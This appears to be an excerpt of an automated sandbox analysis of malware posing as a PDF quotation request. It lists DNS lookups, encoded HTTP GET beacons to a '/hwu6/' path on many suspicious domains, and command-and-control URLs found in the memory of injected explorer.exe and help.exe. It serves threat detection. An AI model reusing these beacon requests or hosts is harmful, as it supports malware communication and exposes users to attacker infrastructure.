          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00ABCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00ABCE44
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=VqwCA0fDirS9FNcK+XWY5HArCimG0sfrxcJclabbIM4+tzWzOeCWxbUPg8n3aCtVsQmTH2yodQ==&Ez=ltxdQ8m HTTP/1.1Host: www.simo1simo001.clickConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=mpYjKcP0TN+fbEitUHIdgmI2VRYct5ttq2KUkf3p2L9OArgqjWS4GwM5LnRr9sxMQhRrBRaxzw==&Ez=ltxdQ8m HTTP/1.1Host: www.ilsgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=YeF1y3E0QpZaaHwaKvJk7b1+zf3Y35LdyPqCzn7ElcW/f++Fd6XCLGgtd2HkwQuXQqI9c12LSg==&Ez=ltxdQ8m HTTP/1.1Host: www.7b5846.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=FXfZ1xOYYW9swHejpVIfMDCztZ/FrnQZeJUgNQ4rzoTHCxvijkBbGX2//Z/tWIGDAo4gMXnXlg==&Ez=ltxdQ8m HTTP/1.1Host: www.maheshg.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=+zwICv/sB1e6MtWwpRel8f5Q0bYKICZzsoJO8W/+cdiLpY7N+AEBhZIv3jjSTSPlRhhnl/FLAA==&Ez=ltxdQ8m HTTP/1.1Host: www.gequiltdesins.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.simo1simo001.click
          Source: global trafficDNS traffic detected: DNS query: www.ilsgroup.net
          Source: global trafficDNS traffic detected: DNS query: www.7b5846.online
          Source: global trafficDNS traffic detected: DNS query: www.91uvq.pro
          Source: global trafficDNS traffic detected: DNS query: www.maheshg.xyz
          Source: global trafficDNS traffic detected: DNS query: www.hair-transplantation-65829.bond
          Source: global trafficDNS traffic detected: DNS query: www.gequiltdesins.shop
          Source: global trafficDNS traffic detected: DNS query: www.backstretch.store
          Source: global trafficDNS traffic detected: DNS query: www.health-insurance-cake.world
          Source: global trafficDNS traffic detected: DNS query: www.86339.xyz
          Source: global trafficDNS traffic detected: DNS query: www.d66dr114gl.bond
          Source: explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000002.4776588202.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000002.4775355459.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4775380521.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4770959078.00000000028A0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online/hwu6/www.91uvq.pro
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.onlineReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.86339.xyz
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.86339.xyz/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.86339.xyz/hwu6/www.d66dr114gl.bond
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.86339.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.91uvq.pro
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.91uvq.pro/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.91uvq.pro/hwu6/www.maheshg.xyz
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.91uvq.proReferer:
          Source: explorer.exe, 00000003.00000003.2980563020.000000000C3C4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2351958536.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2979678355.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980460373.000000000C35C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980802198.000000000C40D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.backstretch.store
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.backstretch.store/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.backstretch.store/hwu6/www.health-insurance-cake.world
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.backstretch.storeReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.d66dr114gl.bond
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.d66dr114gl.bond/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.d66dr114gl.bond/hwu6/www.ozzd86fih4.online
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.d66dr114gl.bondReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gequiltdesins.shop
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gequiltdesins.shop/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gequiltdesins.shop/hwu6/www.backstretch.store
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gequiltdesins.shopReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hair-transplantation-65829.bond
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hair-transplantation-65829.bond/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hair-transplantation-65829.bond/hwu6/www.gequiltdesins.shop
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hair-transplantation-65829.bondReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.health-insurance-cake.world
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.health-insurance-cake.world/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.health-insurance-cake.world/hwu6/www.vibrantsoul.xyz
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.health-insurance-cake.worldReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilsgroup.net
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilsgroup.net/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilsgroup.net/hwu6/www.7b5846.online
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilsgroup.netReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyz
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyz/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyz/hwu6/www.hair-transplantation-65829.bond
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.moocatinght.top
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.moocatinght.top/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.moocatinght.top/hwu6/www.suv-deals-49508.bond
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.moocatinght.topReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.online
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.online/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.online/hwu6/www.piedmontcsb.info
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.onlineReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piedmontcsb.info
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piedmontcsb.info/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piedmontcsb.info/hwu6/www.moocatinght.top
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piedmontcsb.infoReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simo1simo001.click
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simo1simo001.click/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simo1simo001.click/hwu6/www.ilsgroup.net
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simo1simo001.clickReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv-deals-49508.bond
          Source: explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv-deals-49508.bond/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv-deals-49508.bondReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz/hwu6/www.86339.xyz
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyzReferer:
          Source: explorer.exe, 00000003.00000002.4782465999.000000001111F000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4771639384.0000000003EFF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://301.gn301.com:4500/?u=
          Source: explorer.exe, 00000003.00000003.2979322118.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348802491.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 00000003.00000002.4780167257.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2351958536.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000002.4776588202.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
